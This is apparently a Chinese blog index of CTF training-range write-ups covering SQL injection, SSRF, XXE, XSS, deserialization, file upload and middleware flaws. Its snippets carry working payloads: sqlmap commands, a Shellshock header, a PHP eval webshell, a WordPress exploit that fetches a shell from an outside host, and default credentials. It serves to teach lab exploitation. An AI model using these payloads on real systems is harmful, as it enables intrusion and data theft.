
靶场练习笔记
安鸾渗透实战平台
靶场个人练习笔记,涵盖15种类型,大概40题
漏了个大洞
只有用心,才能赢得精彩。
展开
-
靶场练习:jsp+oracle注入
靶场地址:解题准备:sqlmap解题思路:1、库名sqlmap -u "http://61.136.208.14:8002/ActionServlet?action=viewArticle&articleId=1000" --dbs --batch2、表名sqlmap -u "http://61.136.208.14:8002/ActionServlet?action=viewArticle&articleId=1000" -D XBLO --tables -原创 2021-10-16 10:20:46 · 536 阅读 · 0 评论 -
aspx+mssql注入:Sqlmap
靶场地址:http://61.136.208.14:8001/解题准备:Sqlmap解题思路:1、使用工具尝试注入sqlmap -u "http://61.136.208.14:8001/Content.aspx?ClassId=1&id=4" --dbs --batch2、库名3、表名sqlmap -u "http://61.136.208.14:8001/Content.aspx?ClassId=1&id=4" -D dznews --tables..原创 2021-10-16 10:16:01 · 571 阅读 · 0 评论 -
漏洞验证:SSRF-3
靶场地址:http://www.whalwl.host:8090/解题准备:爆破端口、准备外网服务器获取KEY值解题思路:1、思路与第二题一样,先确定本地开放端口BP抓包,设置变量,跑一遍发现XXXX端口打开,并有提示信息2、在外网服务器上使用NC监听一个端口,比如80883、靶场输入服务器IP和端口,即可获取key4、将key的值赋予参数auth,即可发现flag...原创 2021-10-16 10:07:30 · 216 阅读 · 0 评论 -
代码审计:PHP代码审计01
靶场地址:http://www.whalwl.xyz:8017解题准备:熟悉PHP中的参数传递解题思路:1、在查询账户页面构造payload,POST方式提交name=or%2F**%2F1%3D1%23%27&submit=%E6%9F%A5%E8%AF%A22、直接获取flag, name=or/**/1=1#'...原创 2021-10-16 09:59:07 · 413 阅读 · 0 评论 -
反序列化漏洞验证:unserialize反序列化
靶场地址:http://www.whalwl.site:8026/解题准备:了解unserialize函数解题思路:1、将靶场提示代码搭建成网页,手动添加$obj=new site();echo serialize($obj);2、访问网页获取反序列化后的字符串使用dage参数传递反序列化字符串,尝试各种危险函数,最后assert成功了3、 POST方式提交dage,执行ls命令,得到flag文件名dage=O:4:"site":3:{s:3:"url";s:原创 2021-10-16 09:51:56 · 555 阅读 · 0 评论 -
反序列化:JBOSS反序列化
靶场地址:http://whalwl.site:8037/解题准备:反序列化基本原理解题思路:1、访问首页,发现有管理员后台链接,点击后获得JBOSS版本JBoss AS 6 Admin Console2、网上搜索相关漏洞访问这个地址报500,说明漏洞存在3、下载漏洞利用工具,填写刚才的漏洞地址,检测存在漏洞,执行相关系统命令获取flag4、工具直接执行命令...原创 2021-10-15 11:49:18 · 469 阅读 · 0 评论 -
中间件:tomcat任意文件写入
靶场地址:http://www.whalwl.site:18082解题准备:网上找exp解题思路:1、expimport requestsimport sysimport time'''Usage: python CVE-2017-12615.py http://127.0.0.1 shell: http://127.0.0.1/201712615.jsp?pwd=fff&cmd=whoami'''def attack(url): user_agent=原创 2021-10-15 11:45:55 · 278 阅读 · 0 评论 -
中间件:Weblogic弱口令&反序列化
靶场地址:http://www.whalwl.site:17001/hello/解题准备:jsp、linux查找文件命令解题思路:1、weblogic默认后台,弱口令weblogic Oracle@123http://www.whalwl.site:17001/console2、成功登录后台,左侧部署,选择安装3、选择已经存在的hello.war,选择上载文件,上传本地jsp4、一直下一步,直到最后保存5、成功访问jsp脚本,蚁剑连接成功6、翻了..原创 2021-10-15 11:40:27 · 928 阅读 · 0 评论 -
中间件:tomcat弱口令
靶场地址:http://www.whalwl.site:18081解题准备:弱口令、准备asp、jsp马解题思路:1、进入网站默认登录地址,使用弱口令tomcat tomcat登录后台http://www.whalwl.site:18081/manager/html2、在war上传点上传一句话,要求是.war后缀3、第一次使用asp木马,虽然能够连接但似乎没有权限,无法读取文件4、第二次使用jsp木马,网上复制一个蚁剑的,密码是passwd<%! cl.原创 2021-10-15 11:32:18 · 1463 阅读 · 0 评论 -
CMS漏洞:wordpress01
靶场地址:http://whalwl.site:8041/解题准备:准备POC解题思路:1、抓包,准备修改数据包执行命令,远程下载一个shell,到靶场网站根目录。/usr/bin/wget --output-document /var/www/html/999.php 167.160.xxx.217/999.txt2、具体请求包:POST /wp-login.php?action=lostpassword HTTP/1.1Host: target(any -fr...原创 2021-10-15 11:22:38 · 967 阅读 · 0 评论 -
SSRF:SSRF-02
靶场地址:http://www.whalwl.host:8090/解题准备:AWVS、BP爆破模块解题思路:1、扫描发现敏感文件2、发现限制IP访问,由于是服务器帮我们访问,IP应该没问题,那么可能是端口不对3、抓包,修改为本机127访问,并控制端口为变量4、爆破出200OK的端口号,重新访问status...原创 2021-10-15 11:18:11 · 473 阅读 · 0 评论 -
SSRS:SSRF-01
靶场地址:http://www.whalwl.host:8012/bug/ssrf/ssrf.php解题准备:SSRF原理,以及提示信息的理解解题思路:1、通过提示,搜索框访问http://dagebiedawo:802、查看源代码3、发现flag文件路径4、让服务器继续帮我们访问,搜索框粘贴flag地址,得到flag...原创 2021-10-15 11:13:52 · 291 阅读 · 0 评论 -
XXE:XXE外部实体漏洞
靶场地址:http://www.whalwl.host:8016/解题准备:XML外部实体注入,简称XXE解题思路:1、登录界面,点击login抓包,修改poc<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///flag"> ]><user><username>&xxe;</username><原创 2021-10-15 11:07:48 · 309 阅读 · 0 评论 -
经典CVE:PHPMailer 远程命令执行漏洞
靶场地址:http://whalwl.site:8038/解题准备:了解PHPMailer 远程命令执行漏洞的利用方法解题思路:1、在右键发送页面,构造一句话2、提示发送失败,但其实一句话已经完成3、 尝试访问一句话,成功4、蚁剑连接成功,去找flag把...原创 2021-10-15 11:02:19 · 594 阅读 · 0 评论 -
经典CVE:破壳漏洞
靶场地址:http://www.whalwl.site:8029/解题准备:CVE编号:CVE-2014-6271解题思路:1、点击靶场主页的poc.cgi进行抓包,修改User-Agent:User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /bin/ls /2、成功执行后,即可发现flag文件3、继续查看flag...原创 2021-10-14 14:11:09 · 285 阅读 · 0 评论 -
经典CVE:Nginx整数溢出漏洞
靶场地址:http://www.whalwl.site:8040/ 解题准备:了解Nginx整数溢出漏洞的利用方法解题思路:1、根据首页提示,手动访问http://www.whalwl.site:8040/proxy/demo.png2、发现图片存在,于是根据提示构造poyloadcurl -i http://www.whalwl.site:8040/proxy/demo.png -r -17190,-9223372036854758618 > poc.txt3、..原创 2021-10-14 14:07:25 · 871 阅读 · 0 评论 -
命令执行:命令执行02
靶场地址:http://whalwl.xyz:8034/ 解题准备:准备DNSlog解题思路:1、万能密码绕过,成功登录1‘ or 1#密码随便,登录2、登录后进入控制台3、打开DNSLog.cn 获取一个域名,复制下来4、返回控制台,添加云主机的ip,红线处替换成刚刚复制的域名,提交备注1:ping -c 1 域名表示向域名,发送指定数量(1)的ping包备注2:linux中反引号的作用(` `)-------获取执行命令的结果例如:...原创 2021-10-14 14:03:15 · 394 阅读 · 0 评论 -
命令执行:命令执行01
靶场地址:http://whalwl.xyz:8033/ 解题准备:BP抓包,了解linux基本解压命令解题思路:1、BP抓包,替换POST中name的值backup.tar.gz;echo '<?php @eval($_POST["x"]); ?>' >shell.php2、成功上传3、使用蚁剑连接http://whalwl.xyz:8033/shell.php 密码为 x...原创 2021-10-14 13:58:35 · 200 阅读 · 0 评论 -
命令执行:webshell&中国菜刀
靶场地址:http://www.whalwl.xyz:8013解题准备:了解webshell的基本原理,以及连接数据库的参数定义解题思路:1、进入网站,直接告诉了webshell地址和连接密码2、使用中国蚁剑,连接成功。3、进入文件管理,一共四个文件,从init.php得到数据库配置信息4、 手动连接数据库5、填写数据库配置,测试连接成功,添加!6、从数据库中找到flag。...原创 2021-10-14 11:58:04 · 765 阅读 · 0 评论 -
命令执行:PHP代码练习
靶场地址:http://www.whalwl.xyz:8022/解题准备:了解PHP中调用系统命令的函数解题思路:1、编写系统命令代码2、查看根目录下的文件3、相对路径打开4、另一种路径打开原创 2021-10-14 11:53:45 · 113 阅读 · 0 评论 -
文件上传:00截断演练
靶场地址:http://whalwl.site:8025/解题准备:了解URL和POST方式的00截断姿势解题思路:1、方法:抓包2、在十六进制中进行00截断3、记录上传路径4、成功访问5、 蚁剑成功连接...原创 2021-10-14 11:50:07 · 176 阅读 · 0 评论 -
渗透测试:文件上传01
靶场地址:http://www.whalwl.site:8024/解题准备:了解文件上传的常见验证方式解题思路:1、弱口令 admin admin 登录后台在财务管理最下方有上传附件,确定为上传点先上传一张正常图片,获取到图片存储路径2、上传.jpg的一句话,抓包修改后缀php,即可使用蚁剑连接获取flag3、访问一下updata路径,发现已经成功上传4、蚁剑成功连接...原创 2021-10-15 11:04:06 · 261 阅读 · 0 评论 -
文件包含:LFI本地文件包含02
靶场地址:http://www.whalwl.site:8028/解题准备:AWVS、上传点比较难找解题思路:1、按照提示AWVS开扫2、访问提示文件,发现账号密码3、上传点在这里4、检测下是否成功上传5、返回首页,点击刚刚创建的项目,发现已经成功解析6、使用菜刀连接成功,发现flag...原创 2021-10-14 11:35:29 · 363 阅读 · 1 评论 -
文件包含:LFI本地文件包含
靶场地址:http://www.whalwl.site:8014解题准备:AWVS、文件包含的原理解题思路:1、先用awvs进行扫描,确定目录结构,便于后面进行文件包含发现上传页面,上传图片马,记录路径文件名upload/202109021156467259.png手动访问图片,确定成功上传返回主页,进行文件包含,采用相对路径,成功用PHP解析了图片马蚁剑连接该包含图片地址,连接成功,flag在网站根目录下...原创 2021-10-14 11:25:29 · 279 阅读 · 0 评论 -
文件上传:Nginx解析漏洞
靶场地址:http://www.whalwl.site:8020/解题准备:了解Nginx解析漏洞解题思路:1、准备测试图片马首先做一个图片phpinfo(), .jpg上传成功,返回上传后的图片地址uploadfiles/b5f7a062d84869fe4f3af35b79fca50c.jpg2、浏览器访问图片地址,证明文件确实存在3、根据Nginx解析漏洞,在地址后面添加/1.php,成功执行4、同理上传一句话图片马。5、地址后面添加/.php,...原创 2021-10-12 23:33:12 · 632 阅读 · 0 评论 -
SQL注入:DNSlog注入
靶场地址:http://61.136.208.14:8003/解题准备:DNSlog平台解题思路:1、根据提示,需要使用dnslog平台进行注入DNSLog Platform生成并复制域名2、然后判断靶场的闭合符id=1 页面正常id=1' id=1' --+ 报错id=1 and 1=1 页面正常id=1 and 1=2 页面不正常确定没有闭合符,应该是数字型根据DNSlog注入的通用语句,构建注入语句?id=1 and (select load_原创 2021-10-12 23:21:01 · 909 阅读 · 0 评论 -
SQL注入:SOAP协议注入
靶场地址:http://www.whalwl.host:8018/解题准备:AWVS扫描,以及sqlmap解题思路:1、首先用AWVS扫描站点,发现存在soap注入的页面地址2、复制请求数据包,在kali中保存为soap.txt,使用sqlmap进行爆破sqlmap -r soap.txt3、确认数据为mysql,爆破库名sqlmap -r soap.txt --dbms mysql --dbswhalwl应该就是靶场数据库,继续爆tablessqlm...原创 2021-10-12 23:02:06 · 813 阅读 · 0 评论 -
SQL注入:宽字节注入02
靶场地址:http://whalwl.host:8036/解题准备:注入点比较难找,而且抓包后需要追踪302跳转页面解题思路:1、找到注入点首先需要注册账号,登录后选择一款商品加入购物车,进入结算中心2、抓包注入,追踪302此时使用BP抓包,在provincce参数进行注入,注意要追踪302重定向后的页面,点击Follow redirection通过添加 ' 触发报错,通过报错语句确定闭合符为 ’)3、追踪302后即可确定数据库名:ecshop后.原创 2021-10-12 22:43:18 · 348 阅读 · 0 评论 -
SQL注入:宽字符注入
靶场地址:http://www.whalwl.host:8011解题准备:理解GBK的编码时,%5c拼接宽字符从而得到'解题思路:1、根据页面的提示,认为构造%df' 成功闭合 2、确定字段数3、确定字段数为5,使用联合查询看看回显位置4、顺利拿到数据库名和用户名后续注入不再赘述。...原创 2021-10-12 22:34:59 · 347 阅读 · 0 评论 -
SQL注入:POST盲注&万能密码/SQL报错注入
靶场地址:http://www.whalwl.host:8003/user/login.phphttp://www.whalwl.host:8004/user/edit.php解题准备:本题需要使用burpsuite解题思路:1、根据提示,个人中心,更新用户名这里存在POST注入BP抓包,对POST中username进行语法尝试,添加 ' 出现SQL报错采用报错注入,不需要进行盲注添加',根据报错判断,多了一个'闭合符为 ''...原创 2021-10-11 22:59:17 · 696 阅读 · 0 评论 -
SQL注入:SQL搜索型盲注
靶场地址:Web漏洞渗透测试系统http://www.whalwl.host:8002/search.php解题准备:本题需要使用wpsan,kali自带解题思路:1、首先登录,进入留言板,根据提示,通过搜索框进行注入a' 页面异常a' and 1=1 # 页面正常a' order by 10 # 异常a' order by 6 # 异常a' order by 5 # 正常确定字段数为52、使用hackbar,使用联合查询,如果在原网页提交查询,需要将get语句手原创 2021-10-11 22:54:35 · 359 阅读 · 0 评论 -
SQL注入:X-Forwarded-For注入
靶场地址:http://www.whalwl.host:8010/解题准备:本题需要使用burpsuite抓包解题思路:1、根据提示,直接抓包,添加X-Forwarded-For参数 a'2、根据报错,确定闭合符为 '构造:a' order by 6#5正常,6错误,确定字段数为53、构造联合查询,发现有2,3回显4、获得user和database5、后续注入通过联合查询可以很快获取flag...原创 2021-10-11 22:48:02 · 581 阅读 · 1 评论 -
SQL注入:Cookie注入
靶场地址:http://www.whalwl.host:8009解题准备:本题需要使用sqlmap,kali自带解题思路:1、根据提示,添加cookie参数id=1,放到sqlmap中跑sqlmap -u "http://www.whalwl.host:8009/user.php?" --cookie "id=1" --dbms mysql --level 2显示存在注入2、继续爆库名sqlmap -u "http://www.whalwl.host:8009/u..原创 2021-10-11 22:43:04 · 231 阅读 · 0 评论 -
XSS:XSS挖掘&绕过
靶场地址:http://www.whalwl.top:8013解题准备:本题需要绕过特殊符号的过滤解题思路:根据主页留言板,管理员告诉我们flag在它那里,于是给他私信,让它中招1、首先新建两个小号,互相测试哪种代码能够成功绕过过滤确定XSS代码后,再给管理员发私信,通过xss平台成功获取管理员cookie。经过小号互相测试,发现私信会过滤<s以及script,采用<img报错触发代码可以绕过,顺利收集cookie<img...原创 2021-10-11 21:40:51 · 614 阅读 · 0 评论 -
XSS:交友平台XSS漏洞
靶场地址:http://www.whalwl.top:8033解题准备:本题需要破解验证码,php和python脚本均可解题思路:1、注册,登录,出现两个链接两个都点开看看,第一个是更新资料页面,尝试XSS弹窗发现输入的代码原样显示,并没有起作用,此页面没有源代码,只能查看元素发现一对可疑元素<textarea></textarea>包括了输入的代码。于是先尝试闭合这个元素,点击更新,成功弹窗。</textarea>a..原创 2021-10-11 21:16:40 · 597 阅读 · 0 评论 -
XSS:存储型XSS
靶场地址:http://www.whalwl.top:8006/解题准备:存储型XSS的基本方法即可解题解题思路:1、首先登录,发布留言,测试是否可以弹窗aaa<script>alert("xss")</script>成功弹窗,继续测试获取本地cookieaaa<script>alert(document.cookie)</script>并没有发现flag根据提示,需要钓鱼管理员,因此需要准备XSS...原创 2021-10-11 20:57:51 · 493 阅读 · 0 评论 -
靶场练习:SSH离线破解
靶场地址:test@118.190.133.35:22000解题准备:本题需要使用john,kali自带解题思路:1、启动kali,破解ssh密码john --w:john_dict.txt --format=sha512crypt shadow2、xshell建立SSH连接成功登录后,查看当前目录,未发现flag,进入根目录发现flag...原创 2021-10-11 20:35:04 · 524 阅读 · 0 评论 -
靶场练习:wordpress后台破解
靶场地址:http://whalwl.icu:8090/ 解题准备:本题需要使用wpsan,kali自带解题思路:1、kali --> wpscan-->破解用户名wpscan --url http://whalwl.icu:8090/ --enumerate u 2、拿到爆出的用户名,使用本题提供的字典爆密码,即可拿到后台账号密码wpscan --url http://whalwl.icu:8090/ -U whalwlweb -P /root/dict.tx.原创 2021-10-11 20:17:16 · 1128 阅读 · 0 评论